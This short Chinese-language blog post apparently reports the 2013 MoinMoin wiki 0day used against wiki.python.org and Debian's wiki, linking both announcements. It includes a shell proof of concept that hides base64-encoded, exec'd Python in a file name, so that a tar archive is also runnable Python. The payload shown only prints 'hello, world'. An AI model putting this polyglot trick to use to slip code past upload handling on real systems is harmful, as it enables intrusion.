moin moin wiki的0day,日了python.org,再日debian.org。

Python声明

http://pyfound.blogspot.com/2013/01/wikipythonorg-compromised.html

Debian声明

http://lists.debian.org/debian-devel-announce/2013/01/msg00000.html

  $ touch "exec __import__('base64').b64decode('cHJpbnQgImhlbGxvLCB3b3JsZCI=')"            
  $ tar cf result.py !$
  tar cf result.py "exec __import__('base64').b64decode('cHJpbnQgImhlbGxvLCB3b3JsZCI=')"
  $ python result.py 
  hello, world
  $ tar xvf result.py
  x exec __import__('base64').b64decode('cHJpbnQgImhlbGxvLCB3b3JsZCI=')
  $

这个是0day的PoC。。。。

简单的说,就是一个上传,既是合法的tar文件,又是合法的python代码。omg碉堡了。

今天Ruby on Rails也被日了。

什么时候来日django?

via 1, 2, 3

Comments